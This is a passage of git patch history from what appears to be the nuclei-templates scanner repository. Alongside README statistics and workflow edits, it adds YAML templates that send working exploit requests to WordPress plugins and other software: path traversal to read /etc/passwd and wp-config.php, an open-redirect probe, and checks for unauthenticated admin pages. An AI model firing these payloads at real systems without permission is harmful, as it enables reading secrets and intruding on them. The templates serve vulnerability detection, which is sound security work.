| | | | | +| kerbynet | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| openvpn | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| ecoa | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 14d3b72a5f..079531ae29 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 724 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | -| lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | -| xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | +| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | +| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | +| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | +| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | | exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | +| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | | wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | From f030b15b1a8ffa3ab5ff307b828664112caf6c62 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 22 Sep 2021 14:58:38 +0000 Subject: [PATCH 2479/4083] Auto Update README [Wed Sep 22 14:58:38 UTC 2021] :robot: --- README.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/README.md b/README.md index d27919e54a..2a35d58bb3 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 724 | pikpikcu | 273 | cves | 724 | info | 642 | http | 1962 | -| lfi | 258 | dhiyaneshdk | 258 | vulnerabilities | 299 | high | 552 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 248 | medium | 449 | network | 41 | -| xss | 244 | pdteam | 196 | technologies | 190 | critical | 271 | dns | 12 | +| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | +| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | +| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | +| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | | exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 222 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | | rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 65 | default-logins | 56 | | | | | +| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | | cve2020 | 164 | madrobot | 61 | file | 46 | | | | | | wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | -**164 directories, 2122 files**. +**166 directories, 2125 files**. From 58ca327e55190afaf8e4bbf927c61fcd4684da7b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 22 Sep 2021 21:07:10 +0530 Subject: [PATCH 2480/4083] misc update --- .../{update-readme.yml => readme-update.yml} | 17 +++++++++-------- .github/workflows/templates-stats.yml | 2 +- 2 files changed, 10 insertions(+), 9 deletions(-) rename .github/workflows/{update-readme.yml => readme-update.yml} (78%) diff --git a/.github/workflows/update-readme.yml b/.github/workflows/readme-update.yml similarity index 78% rename from .github/workflows/update-readme.yml rename to .github/workflows/readme-update.yml index 0f59dd9677..9cec001f00 100644 --- a/.github/workflows/update-readme.yml +++ b/.github/workflows/readme-update.yml @@ -1,15 +1,16 @@ name: 📝 Readme Update on: - create: - tags: - - v* + workflow_run: + workflows: ["🗒 Templates Stats"] + types: + - completed workflow_dispatch: jobs: build: runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - name: Install tree run: sudo apt-get install tree -y @@ -26,20 +27,20 @@ jobs: python-version: "3.8" - name: Update README - id: update-readme + id: readme-update run: | python .github/scripts/update-readme.py echo "::set-output name=changes::$(git status -s | wc -l)" - name: Commit files - if: steps.update-readme.outputs.changes > 0 + if: steps.readme-update.outputs.changes > 0 run: | git config --local user.email "action@github.com" git config --local user.name "GitHub Action" - git commit -m "Auto Update README [$(date)] :robot:" -a + git commit -m "Auto README Update [$(date)] :robot:" -a - name: Push changes - if: steps.update-readme.outputs.changes > 0 + if: steps.readme-update.outputs.changes > 0 uses: ad-m/github-push-action@master with: github_token: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index db02a5df05..22f43e7261 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -9,7 +9,7 @@ on: jobs: build: runs-on: ubuntu-latest - if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master' + if: github.repository == 'projectdiscovery/nuclei-templates' steps: - uses: actions/checkout@master - uses: actions/setup-go@v2 From ff844ba63cf8f721d602b2179e51aff600c3ef13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=93scar=20Mar=C3=ADn?= Date: Wed, 22 Sep 2021 21:10:03 +0200 Subject: [PATCH 2481/4083] Added CVE-2021-40875 Template --- cves/2021/CVE-2021-40875.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-40875.yaml diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml new file mode 100644 index 0000000000..fdb4f9eac6 --- /dev/null +++ b/cves/2021/CVE-2021-40875.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-40875 + +info: + name: Gurock TestRail Application files.md5 exposure + author: oscarintherocks + severity: medium + description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data. + tags: cve,cve2021,exposure,gurock,testrail + reference: + https://github.com/SakuraSamuraii/derailed + https://johnjhacking.com/blog/cve-2021-40875/ + https://www.gurock.com/testrail/tour/enterprise-edition + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 + classification: + cve-id: CVE-2021-40875 + +requests: + - method: GET + path: + - "{{BaseURL}}/files.md5" + - "{{BaseURL}}/testrail/files.md5" + + matchers-condition: and + matchers: + - type: word + words: + - "app/arguments/admin" + condition: and + + - type: status + status: + - 200 From 2df403879a942c21663b8eb2a85aecadf3c0e62a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 23 Sep 2021 07:07:52 +0700 Subject: [PATCH 2482/4083] Create CVE-2021-39316.yaml --- cves/2021/CVE-2021-39316.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2021/CVE-2021-39316.yaml diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml new file mode 100644 index 0000000000..579b66c1ec --- /dev/null +++ b/cves/2021/CVE-2021-39316.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-39316 + +info: + name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download + author: daffainfo + severity: high + description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. + reference: https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd + tags: wordpress,cve2021,cve,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From e3dc2ef1ec1c6c58fa96c764532a34cd88b33b81 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 23 Sep 2021 10:58:40 +0530 Subject: [PATCH 2483/4083] Update CVE-2021-39316.yaml --- cves/2021/CVE-2021-39316.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml index 579b66c1ec..f8fee28d75 100644 --- a/cves/2021/CVE-2021-39316.yaml +++ b/cves/2021/CVE-2021-39316.yaml @@ -5,8 +5,10 @@ info: author: daffainfo severity: high description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. - reference: https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - tags: wordpress,cve2021,cve,lfi + reference: + - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 + tags: wordpress,cve2021,cve,lfi,wp-plugin requests: - method: GET From 49f53e2e5647cbce9f8bfbf79229dcdaaa6b3c54 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 Sep 2021 06:09:32 +0000 Subject: [PATCH 2484/4083] Auto Generated CVE annotations [Thu Sep 23 06:09:32 UTC 2021] :robot: --- cves/2021/CVE-2021-39316.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml index f8fee28d75..693e3bd541 100644 --- a/cves/2021/CVE-2021-39316.yaml +++ b/cves/2021/CVE-2021-39316.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 tags: wordpress,cve2021,cve,lfi,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-39316 + cwe-id: CWE-22 requests: - method: GET From b39b785461ba87e9e72e7b85dad2479175dbe30a Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 23 Sep 2021 15:29:04 +0530 Subject: [PATCH 2485/4083] misc update --- cves/2021/CVE-2021-40875.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml index fdb4f9eac6..230a668cad 100644 --- a/cves/2021/CVE-2021-40875.yaml +++ b/cves/2021/CVE-2021-40875.yaml @@ -20,12 +20,14 @@ requests: - "{{BaseURL}}/files.md5" - "{{BaseURL}}/testrail/files.md5" + max-size: 1000 # Define response size in bytes to read from server. + stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: - "app/arguments/admin" - condition: and - type: status status: From 24376a47e7919283b8f7d9837b53f1b61ba4b738 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 23 Sep 2021 15:30:58 +0530 Subject: [PATCH 2486/4083] Added shodan query --- cves/2021/CVE-2021-40875.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml index 230a668cad..4144e75270 100644 --- a/cves/2021/CVE-2021-40875.yaml +++ b/cves/2021/CVE-2021-40875.yaml @@ -13,6 +13,8 @@ info: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 classification: cve-id: CVE-2021-40875 + metadata: + shodan-query: https://www.shodan.io/search?query=TestRail requests: - method: GET From 8a10013f457df18deb6384b4aa84ebeb9c39808b Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 23 Sep 2021 22:34:28 -0300 Subject: [PATCH 2487/4083] Create jenkins-workflow.yaml --- workflows/jenkins-workflow.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 workflows/jenkins-workflow.yaml diff --git a/workflows/jenkins-workflow.yaml b/workflows/jenkins-workflow.yaml new file mode 100644 index 0000000000..d0bd0c038e --- /dev/null +++ b/workflows/jenkins-workflow.yaml @@ -0,0 +1,12 @@ +id: jenkins-workflow + +info: + name: Jenkins workflow + author: philippedelteil + description: Workflow that runs all Jenkins related nuclei templates + +workflows: + + - template: technologies/jenkins-detect.yaml + subtemplates: + - tags: jenkins From 1f679d8b4ea27d0c9c2d2ddc64c4b278c52a7d77 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 23 Sep 2021 23:18:41 -0300 Subject: [PATCH 2488/4083] =?UTF-8?q?Create=20CVE-2018=E2=80=939845.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2018/CVE-2018–9845.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2018/CVE-2018–9845.yaml diff --git a/cves/2018/CVE-2018–9845.yaml b/cves/2018/CVE-2018–9845.yaml new file mode 100644 index 0000000000..c16e2c0e14 --- /dev/null +++ b/cves/2018/CVE-2018–9845.yaml @@ -0,0 +1,31 @@ +id: CVE-2018–9845 + +info: + name: Etherpad Lite before 1.6.4 is exploitable for admin access. + author: philippedelteil + severity: critical + reference: + - https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 + - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-9845 + + tags:cve,cve2018,etherpad + +requests: + - method: GET + path: + - "{{BaseURL}}/Admin" + redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Etherpad version" + - "Plugin manager" + - type: status + status: + - 200 From 0614a6031ca59462120b45e653213c5eb159576a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 24 Sep 2021 15:05:21 +0530 Subject: [PATCH 2489/4083] =?UTF-8?q?Update=20CVE-2018=E2=80=939845.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2018/CVE-2018–9845.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018–9845.yaml b/cves/2018/CVE-2018–9845.yaml index c16e2c0e14..c803993361 100644 --- a/cves/2018/CVE-2018–9845.yaml +++ b/cves/2018/CVE-2018–9845.yaml @@ -11,13 +11,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9845 - - tags:cve,cve2018,etherpad + tags: cve,cve2018,etherpad,auth-bypass requests: - method: GET path: - "{{BaseURL}}/Admin" + redirects: true matchers-condition: and matchers: @@ -26,6 +26,9 @@ requests: words: - "Etherpad version" - "Plugin manager" + - "Installed parts" + condition: and + - type: status status: - 200 From 6cb56d3b77f270e1be7f9741318f55b486d1bb68 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 24 Sep 2021 15:05:45 +0530 Subject: [PATCH 2490/4083] =?UTF-8?q?Update=20CVE-2018=E2=80=939845.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2018/CVE-2018–9845.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018–9845.yaml b/cves/2018/CVE-2018–9845.yaml index c803993361..c835e99eb6 100644 --- a/cves/2018/CVE-2018–9845.yaml +++ b/cves/2018/CVE-2018–9845.yaml @@ -7,6 +7,7 @@ info: reference: - https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b + - https://nvd.nist.gov/vuln/detail/CVE-2018-9845 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 From e38a66454d27369697deec912a8aa9622330caa9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 24 Sep 2021 15:42:22 +0530 Subject: [PATCH 2491/4083] Update jenkins-workflow.yaml --- workflows/jenkins-workflow.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/workflows/jenkins-workflow.yaml b/workflows/jenkins-workflow.yaml index d0bd0c038e..c7fa74756f 100644 --- a/workflows/jenkins-workflow.yaml +++ b/workflows/jenkins-workflow.yaml @@ -7,6 +7,6 @@ info: workflows: - - template: technologies/jenkins-detect.yaml + - template: technologies/jenkins-detect.yaml subtemplates: - - tags: jenkins + - tags: jenkins \ No newline at end of file From cd37224212899ced784ed846a91193060e49b88e Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 24 Sep 2021 15:44:02 +0530 Subject: [PATCH 2492/4083] =?UTF-8?q?Update=20CVE-2018=E2=80=939845.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2018/CVE-2018–9845.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018–9845.yaml b/cves/2018/CVE-2018–9845.yaml index c835e99eb6..996b77a31d 100644 --- a/cves/2018/CVE-2018–9845.yaml +++ b/cves/2018/CVE-2018–9845.yaml @@ -20,6 +20,7 @@ requests: - "{{BaseURL}}/Admin" redirects: true + max-redirects: 2 matchers-condition: and matchers: - type: word From 08894051c8aaabf3a256d723695c45e31d383325 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 24 Sep 2021 15:44:14 +0530 Subject: [PATCH 2493/4083] Update CVE-2015-6920.yaml --- cves/2015/CVE-2015-6920.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2015/CVE-2015-6920.yaml b/cves/2015/CVE-2015-6920.yaml index 9cc2ed0b4b..ae97ca5705 100644 --- a/cves/2015/CVE-2015-6920.yaml +++ b/cves/2015/CVE-2015-6920.yaml @@ -4,6 +4,7 @@ info: name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability. reference: - https://packetstormsecurity.com/files/133371/ - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 From 2156edce703b7af60a7da79d0e94c5986851baaa Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 24 Sep 2021 19:45:50 +0900 Subject: [PATCH 2494/4083] Create wp-brandfolder-plugin-open-redirect.yaml --- wp-brandfolder-plugin-open-redirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 wp-brandfolder-plugin-open-redirect.yaml diff --git a/wp-brandfolder-plugin-open-redirect.yaml b/wp-brandfolder-plugin-open-redirect.yaml new file mode 100644 index 0000000000..c232f15785 --- /dev/null +++ b/wp-brandfolder-plugin-open-redirect.yaml @@ -0,0 +1,19 @@ +id: wp-brandfolder-plugin-open-redirect + +info: + name: Wordpress brandfolder plugin Open Redirect + author: 0x_Akoko + reference: https://www.exploit-db.com/exploits/39591 + severity: low + tags: wp,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From f80e4b59440f9b7f4226150e9f6744d3b7b0409e Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 24 Sep 2021 19:49:09 +0900 Subject: [PATCH 2495/4083] Create wp-brandfolder-plugin-lfi.yaml --- wp-brandfolder-plugin-lfi.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 wp-brandfolder-plugin-lfi.yaml diff --git a/wp-brandfolder-plugin-lfi.yaml b/wp-brandfolder-plugin-lfi.yaml new file mode 100644 index 0000000000..f57fc00d47 --- /dev/null +++ b/wp-brandfolder-plugin-lfi.yaml @@ -0,0 +1,28 @@ +id: wp-plugins-brandfolder-plugin-lfi + +info: + name: Wordpress brandfolder plugin / RFI & LFI + author: 0x_Akoko + severity: high + tags: wordpress,wp-plugin,lfi,rfi + reference: + - https://www.exploit-db.com/exploits/39591 + - https://cxsecurity.com/issue/WLB-2016030120 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 2bdcba17acf1982d9b9ae3cf1e9b624f2d731cc2 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Fri, 24 Sep 2021 19:51:05 +0900 Subject: [PATCH 2496/4083] Create wp-plugin-issuu-panel-lfi.yaml --- wp-plugin-issuu-panel-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 wp-plugin-issuu-panel-lfi.yaml diff --git a/wp-plugin-issuu-panel-lfi.yaml b/wp-plugin-issuu-panel-lfi.yaml new file mode 100644 index 0000000000..1c73990b13 --- /dev/null +++ b/wp-plugin-issuu-panel-lfi.yaml @@ -0,0 +1,24 @@ +id: wp-plugin -issuu-panel-lfi + +info: + name: Wordpress Plugin Issuu Panel - RFI & LFI + author: 0x_Akoko + severity: high + reference: https://cxsecurity.com/issue/WLB-2016030131 + tags: wp,wordpress,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 1861f79053c38b8330d5e3b8300b1b0bd61aee21 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 24 Sep 2021 09:53:44 -0500 Subject: [PATCH 2497/4083] Create openvpn-monitor.yaml --- exposed-panels/openvpn-monitor.yaml | 33 +++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/openvpn-monitor.yaml diff --git a/exposed-panels/openvpn-monitor.yaml b/exposed-panels/openvpn-monitor.yaml new file mode 100644 index 0000000000..0390e843bf --- /dev/null +++ b/exposed-panels/openvpn-monitor.yaml @@ -0,0 +1,33 @@ +id: openvpn-monitor + +info: + name: OpenVPN Monitor Disclosure + description: openvpn-monitor is a simple python program to generate html that displays the status of an OpenVPN server, including all current connections. + reference: https://openvpn-monitor.openbytes.ie/ + author: geeknik + severity: high + tags: disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/openvpn-monitor/' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - 'OpenVPN Status Monitor' + - 'Username' + - 'VPN IP' + - 'Remote IP' + condition: and + - type: word + part: header + words: + - "text/html" From 4b5c91a4b0af807508a17d7014270cea25f9b3c4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 24 Sep 2021 09:57:59 -0500 Subject: [PATCH 2498/4083] Update openvpn-monitor.yaml --- exposed-panels/openvpn-monitor.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/openvpn-monitor.yaml b/exposed-panels/openvpn-monitor.yaml index 0390e843bf..2b9d491b5e 100644 --- a/exposed-panels/openvpn-monitor.yaml +++ b/exposed-panels/openvpn-monitor.yaml @@ -6,7 +6,7 @@ info: reference: https://openvpn-monitor.openbytes.ie/ author: geeknik severity: high - tags: disclosure + tags: openvpn,disclosure requests: - method: GET From 6db5f82a5e85ed18013421872cd0fce666fdd2eb Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 25 Sep 2021 00:45:43 +0530 Subject: [PATCH 2499/4083] Update openvpn-monitor.yaml --- exposed-panels/openvpn-monitor.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposed-panels/openvpn-monitor.yaml b/exposed-panels/openvpn-monitor.yaml index 2b9d491b5e..6178beb3d3 100644 --- a/exposed-panels/openvpn-monitor.yaml +++ b/exposed-panels/openvpn-monitor.yaml @@ -2,11 +2,11 @@ id: openvpn-monitor info: name: OpenVPN Monitor Disclosure - 